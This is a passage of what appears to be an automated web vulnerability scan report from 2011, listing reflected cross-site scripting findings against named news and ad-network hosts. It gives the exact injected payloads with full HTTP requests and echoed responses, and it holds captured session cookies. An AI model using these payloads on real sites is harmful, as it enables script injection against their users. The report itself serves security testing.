Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d73ef70&0&&4d4e2349&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07608=0105974ea67d21e1&G07608&0&4d73f5b7&0&&4d4e15ec&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_C07583=0105974ea67d21e1&C07583&0&4d74e384&0&&4d4f68ce&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d74ec12&0&&4d4e3c30&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_E08745=0105974ea67d21e1&E08745&0&4d7a314a&0&&4d54abd9&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_L09857=0105974ea67d21e1&L09857&0&4d7a5dc4&0&&4d550056&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A10863=0105974ea67d21e1&A10863&0&4d7b9c60&0&&4d54f31a&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H07710=0105974ea67d21e1&H07710&0&4d7bcd81&0&&4d55f92b&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLv3NTHtJjpr36zevo5cxP9XWiwe6sXs+ckYFUcWNFJqvISqiazmj0QAj4ie0hRHjgaCvFyVGRbIAi3mAcogYwmTs25nDPLkZuRnJb6xofNqWDZgKTYgIiyiY3uworqGjYrZuhhIiIPbkg+C3tkBj1bAI+RlDDdXZsADMREf3ny/rm2pgcRIp+UY3NJe1UfWQRrO/hwOk6HHfupD/KJAxLdco+gZsTIqCiHanzrhbOjbJNfe6EseO4cRrLuQqS+GtF+VEGnNUMiTVhZm/z83hMTUB3e23bcBLYzxrHLlNRxJZM12+OOygJR2OJUpCwWMDpGMmWLa7F+RBqPSMT+S66hDyHAR7PWb0VuluI9b4QAk6gqktIH4WCtmH6bTw73EoL5iUKlYN6Z9D6XgHIONjvbz3FccdmElidoQNElZgaHerov4GlDrNmtZQygm46bbAY6CeVtZz+RZ+BZL9YqlbN4bs/fDi5nbv2IQMBNwesF7XJgzfiyngMO309FYvUQ25MwPURyOGuDxC23xHBUsxk1TNvo0NzhtTfeZsrb65BOMVaGRmB/RjqWY0i/V/5iTj3HHc7ROo5AIS/xBovfDciRDExo0FwLr2SvE7DrfvUjHR5shA6bXIJXx7AXPduet7Ztd2Zhk+pGekgCS4DQpsrGYeBK7bbTFo5T/EwK9f1dnGtlUkrKYLnZIBhZDSsDkDYlYQnK2FJfrTWKVc2DpXdfT/9RCHPNZDlS0ZLg3ORKmpjak6CwjfV2Im4oRzrMSQ+W7dtUl/TeXIgQ0d7wlMvuIj5LGRM/rb5zeF79K84yxq+di6p3a/fJPGT42br8shRETc5KJ/6jMXRFMiqraZ5rrWL8PfD1mw4ZfVukmhjtvUfPQ8t7dbyMy8rsx99+FnPEOwvhdMC7u3h3OCIm7BwhWq5thjIbn3/oHj98YjmLABepXte1xK6KEDpdozbOfh+TZQ74/nQdE1mZmz2YotB3hFEEWlJik5M3h7NPKEbrtPOKP79rmu345k9iQ1vbxQhPyO/9r16xaF8aQAc/6UzNWm/+6+PNAebxEOVipIIuuPvkr9eur7h0wlmLuebfs4FRrjd4iZVNZYJgv8NERXegKSQm8qpNy5Zn5sO0AFbxhjhRR6dEaIKqShZ7tRYxX1I+etXNkpLWfmIjvq6vWAGC1BMZypV4PTYC/NuNBvOlTc908HOspCTSdDXYZg1IeTysTII2PDUnHq3Ed/LqMQNaRpjMtdu3yRSyPGdXEkQrfnpAuuFxq2OeARMb42nMC5YpTE/qs/d3dpre6qD7yIyrdpg5r6jaG2oQ2o7jqELpiS9HlemLdFz07twXeX8yeNSWqrtD6tHFepb4D8lCluppEds2BwuodubYd0a5kkXvZUki/+80a2xDw/rek20IuOt318YzbSB0kKPi479t0ie3TijnoCd+R2E4/qd4fpuqL; rtc_0=MLsP9rUKZxpj59KV+d0GobS1ofpFPmyJ6+F6a4PwENs1xPdwNgddSDSVOsHyOd8t4Gul9juL0HAqtiTgQ+wOUj6sHdq18qcN29doGuSlDlfQUx6AAYlMw7oUnof1vIDqnFz5jfVQu36nqn6C5AyR0kECy+QYtjAOsSmgGqpigiaJIyLc2z3MeOuGtBEyZ42uYZU8iXSXjO1q1vl7Cw5uHNUAGA1l1FOXVA2nO7Wv440NH0+cbLe8Aw2jqbVXiS3BZwWWkKUOoO7v4+XDqtAgF8BRPlPTxv8SuqKG1smaLsa7sC2H6pvUQrkbjzCY8tbVNXkfXZ2Cuecebl8itSR/23XNTYWWTG7aDB72gAwyI6TftXRDSq11zxcxwTuKu/quM+xmqtKquNSBlokUqt+GfYzys6TxZfxQIIwcOp3QraOss189QFq4C2GdykVJkjv/OsoSbCYBE1GOcTTLC3bHOuKSpwiKQS7y5Ac0ryu6w6hSSt8miqzf7LA465vLtsDV8Nv0czEXPeyY2xChlOecslsKILK4bbNmlK73d1fw5Bsp4c+k647JuxZ6iiryM6quo5PEM6ToFLzSf0qKTpL12vBFNjNK7kkaKQP9BpBAWFz5uZ5u2kcUK9CSr1SMIBwi5sjqQQBE+XN1Tyix4NegBuJW/bedtok+xskRAFCuTJFagyI+wr1KIvAweiNflWw4K+QURf2o/fxDOJbcKuMD2jCSADrej1Y+DFBr5k4wgKkLsGX7kY/E/cSkEg4OOHwRT6WByRjRR/ufqD9SzaB7LmxrtFp9dbwlvi9gTh1YZuSGYmCTg4XwZ2QJNq+xsc46GWUfM+OMHy5wnbeAnlJHmIY0Z2mErv23JpUX6pbyYxyzkkq4W4djFLnbF2nLHwWAmB9uAyu7amD/B+8+yZOpAUkogl1z9+8Z+6jsuTK/VOi+2y2UiegLvcl61cIDRT/8qRhC2LJ4G+WMe7bW2IVe+9U5FiMAhSxTiPZRFaxS3bdUw0XVvS2zxskmS4zjyIQoGu+8KS/aKqlJ+0KWVxf+cy6N7MGnvi4NH7Mz8fpPShrI9X1GSZ7fxh6GZUlIpfI7Sw2iOtzlxmVcm98YapkjyY7JlNSXts7w9lJi+jD4Y1aLRDYb9qzrT002BvYfISU6s9wOO271mwNHSA4iarDm3+VAQAbTFxP1zd//BFk2y1ZTk/TkDo2ofjJVZREui/tSsMm4ckTRq1G8OS8QueQS1+PcRNTOtBFcCovi0hCKrNzBD4HlKg0pvigPtNZeVKI2MhU0Rh/2AIo8opCZO7ofeje86m/0SEwKtGm1aqj6ovb2kW3lRMSXZ7vt9opHW66DDc6caWR44O+QOF/lz9qoRMhLobDgQ+TkDWKIZWtQsZtW0GM7clhp1r0t52Gk1KGLoBag3ofztC/7bkGMblgi6nb5iwCBFvBp5bPWflhLHZi0zaVuVu4EKJ/Qeqc1rx7vQnOc4b6/wrqHiC+7wQtvlU/MhCbKeAtX7EJ9g5Ek1yGJTFCyzrS/6dhsEjCXWK9T0OuEHHd+9nhqOWSadHIeDkBdHv6YcR/52Djd2oXIzuBTjS0vOBjkjCzRVUKr31r4BPNQi2GE2XHMBeB2/IwbHDGeJsGTSkbN/HOr1X2Ru1q2K5vzAP025R0AHb+cEoiEmmNciguX; rsi_segs_1000000=pUPF4z+huXIMJ/CEaAMFwgwB3JQXgbYffOIWz+9rAA+k8XfpRw9eCQZQqGmcIzTjXSAUBzoDRORma50yQYaTggnMAJWMtfEaCG9RNDhBmhhoFpLVYb1QAaikElI1EzDjWZeplYB7btwtjc30aFwc9SFtsiObQEFHAoe/dYa9RIl6YrHoGVp61CJIknsGjPoisliOJbdyBE/6AhbluZCZcLdmaxkVC/7FIDXZOrPrxbQIcaMlixqdrNOlRsw43z+irf3tiPK5cop1P9m1NhdHHFznLXULZKqBiHgSlB85iqrHPsC1fYazyuIw8vHwUS7AomPmwwXolg1kd5BY0NFb5BQ/QTXBC5w2nIP4uRKPIINoDa4k/29PpifccQtpQpdV+qCJ6fKjUNNmqpI686wDJsOAaUvxt3W+6xU12xtfvaPtnDgSIfyzEDNcScWy9m8Hz9jYvNZDLyTcVhnYhbu11/9v/E9jdiXRXnZJPXbYj7ge0e3QizSDYJYt1ie62jeFk6WA+PNRDJexI/oOxdub7VOBOKK00Bt+ClGige1LLhhtaD4zPpeuhoicx0R9y9LzRPEq3NcTeKIxrG+ICxEQFoP+oWf2t+j6vi0fPocRwd9DEfcnfpwvbmC4QN5KSHmEKqk=; rsi_us_1000000=pUMd4StHMAYY7cmvw1p/36bj1xRpukrv+40/vqtdLOUHLrwk5zZ2qhsPzc+lg3Bt8RLp8iKiUPa3XuCDoBNcfFq/RdgqHN5CKaBoz+O2kREyDWVcMxSyylJEXmDs2DpFzhFlJZMgukW0j5BsAShPRg3ahMzJsvrInsy43Y3Ik1EbcEVGcfcHtm88vnlf/NKKWrTDzxH8ToJcr/KP8aF6wKuIIuSFY1HyfEolYUJ6hIxU/DsQ5pZezzA5PrktqQqi6v3Wv57aF5X89i4Zuo9CxekbLWz3DadfZrzdPZOxOVrNxBEwSeZUC5/8yUpYWynney4v6nl9rZEHZZvsyirMcsDywz7ZKCn4EFchzzXfBpnq8XQz+2sSXsxjJ4Fp5ouY9MNTE7vtIzvBGIs4kVxccu38xRpqVmISo3E1EP7M0WFhjTkPSHf2Y5aEiK+61Wmm4VKwUUqq9aIYXhGOQwTtmVm0v1HfdeZzSCrwbhVvChq4JkwJLhPjd1sp5zjwQnParactZqkrrcCDNfp8DI/WbrJHc0HEg111jln8n8/nBz30lA07KDmM5wrzSD95162vqYltuzijg5OPuyHhY0QsiyDW5jwkD0YwU22K5vXJRridHmZs0bT218krOxLW7gVHDClVbIxIzgcU04neBN4NFrpN2K5OHivrAd1rX1FkWLbs9dnjo7eits8JRk1zm1Zn7HhJu5iJDZNl9dZ4B+edgIAL1oimSfZDscaOmCgCMgxKR2xaDk3km7cEA2e4qT8I2wP8cdib5LHVixXPSd9Y4gjogwVEwJc2Bl5XCy1b66RNlNGEzCRJEZYjYNpmZ030+OIKuC8zbe7ir/Lz6bmqnCZZy+TnJGTDtmbLiaQ8W9FU9TMj596o5RLlEl3SfqBEG7M9o7CrZp2gxC9Vetp9WHixCPr0omjdvfbqCjqr6J2K3NesFI/GIZQH+lgJ++495TC6ZoGhQxLQVJ5ueM5HcKrtrTDDFRTKvb27a+Y4Sgii292yigszCeiwnH7+Uq4dRBgflLO0Z0UE2O3ESjLU/ljWM+Ub2TS3xfJgQIj+aq5z3/AklNbdXdJnU9li4xcPDdZGy7mYLElRhSPr59P2H6afq9KBKPfXXXS1Y2Avd6wgcxqMldeXt6WEA5ZYIH11zu8FxqCCmsQp9t8v2DsH+3KxcwJtDoiOUDdMJa9n8UlMkzdPvOfOonGewmvVaVsBtprgdEMBDIMoMqmiVS5a19OyotaW0voPWaIkmZ/fMm7TvShtl5dHq0B91RCsIgs2CS0HWLEEOZC+V89CvbyW6Keb962RbN1YriQpUjlPG/gVedAxnMstd42yfJ7WmDnHQ6H5I0hnOMr1XElKxyjNFxboa63FpVE4eBC9a2TQCDuloW5275+LblZq5LlXWSIu8OP7XU6PZPHfzCpcp+xUvGsULcWPQqvlBmcHu27bTWvswPzZlatnrlRCTrU+EAcF9YV/ae4FtM2jgAv1+zyXo5ydM0CngasaPNrXfi7RXCEtRvzcrGCDew4RCwP1BLNOgiS7IS62KzdhZK+Z5Gb4h6z/Aq4MTu1GYMGKjuwfCv+qQ/YuImKaLGSfi0ctyRQKAxLXZcyWis1gJ0zbWAH3fdtDHOoX9z0N3PG1puhu51DQl7QxkDEr4Dl1gPStbkem0wITBjfYMyPohW1eXFin2X/+tKqzNtBDyYmaJdqrIQWebd1RR0t4sbou5mlzaou7VR9cvJXpG78ddtsDLATKSnjglI0QKDmZXLMnIp/ePXWcvp3jNAy4Nk50Xq8lh5bOSftsduaYlDHYT9Y5fK+4Hsei6uk/7I5QkDdVtVt462jwGMrg+EeVUT8G4txgkWWDao0Q+k2UtZgFpSXt3jeVp6mmp+FiXaUNm+zdzY2v6bwhqYueugjUyklLOvcE9QDIvnPiHCboy3A91xwjH0aJPI/g2Rb5GY454tH9qvn0vO3qBwYIC7Ay

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 14 Feb 2011 01:34:46 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 15 Feb 2011 01:34:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J0553161C78<SCRIPT>ALERT(1)</SCRIPT>60081D2E459" was not recognized.
*/

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.uk.reuters.com
Path:	/recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1f59%3balert(1)//ba2841abbb3 was submitted in the callback parameter. This input was echoed as e1f59;alert(1)//ba2841abbb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationse1f59%3balert(1)//ba2841abbb3&ed=uk&u=173.193.214.243-2605364368.30126492 HTTP/1.1
Host: js.uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28259640.1297647396.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28259640.2003575633.1297647396.1297647396.1297647396.1; __utmc=28259640; __utmb=28259640.1.10.1297647396; rsi_segs=D08734_70009|D08734_70011|D08734_70049|D08734_70057|D08734_70075|D08734_70086|D08734_70093|D08734_70509|D08734_71432

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:39:11 GMT
Server: Apache-Coyote/1.1
Expires: Mon, 14 Feb 2011 01:49:12 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Connection: close
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3 === 'function') {Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3([]);}

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffd2a'-alert(1)-'1bc15b5788c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.dailymailffd2a'-alert(1)-'1bc15b5788c/ron_052010;sz=300x250;net=cm;ord=3412338;ord1=572356;cmpgurl=http%253A//www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:35:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 14-Feb-2011 09:35:29 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Content-Length: 9197

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-77028052_1297647329","http://ib.adnxs.com/ptj?member=311&inv_code=cm.dailymailffd2a'-alert(1)-'1bc15b5788c&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclic
...[SNIP]...

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6385'-alert(1)-'77065afc5a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.drudgerepf6385'-alert(1)-'77065afc5a2/;sz=300x250;net=cm;ord=$cacheBuster$;ord1=789918;cmpgurl=http%253A//www.drudgereport.com/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:10:21 GMT
Connection: close
Content-Length: 8383

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64453616_1297649421","http://ib.adnxs.com/ptj?member=311&inv_code=cm.drudgerepf6385'-alert(1)-'77065afc5a2&size=300x250&referrer=http%3A%2F%2Fwww.drudgereport.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.drudgerepf6385%27-alert%281%29-%2777065afc5a2%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-64453616_1297649421%
...[SNIP]...

1.192. http://kona5.kontera.com/KonaGet.js [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kona5.kontera.com
Path:	/KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c2dd"%3balert(1)//6cad627a8b3 was submitted in the l parameter. This input was echoed as 2c2dd";alert(1)//6cad627a8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd"%3balert(1)//6cad627a8b3&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=0&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1953

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647520&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
RequestId="37787202445334700";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd";alert(1)//6cad627a8b3&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kona5.kontera.com
Path:	/KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74fff"-alert(1)-"bf142052b was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=074fff"-alert(1)-"bf142052b&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 2004

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647521&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
,157813,'army',512,1,"","39905;57830;7753");
addContentLink(560,1335360,'elections',537,1,"","39905;57830;7753");
}, "reaction response");
konaSafe(function(){
konaTweakMode=134299923;
konaRequestId="074fff"-alert(1)-"bf142052b";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&dc_aff_id=");
onKonaReturn(
...[SNIP]...

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the &adfile request parameter is copied into the HTML document as plain text between tags. The payload 63eb8<a>ae9d22d54df was submitted in the &adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLOGY-NODE-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:45:31 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:45:31 GMT
Content-Length: 717


...[SNIP]...

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 6c6da<a>a48d6ff9148 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:11 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:11 GMT
Content-Length: 591

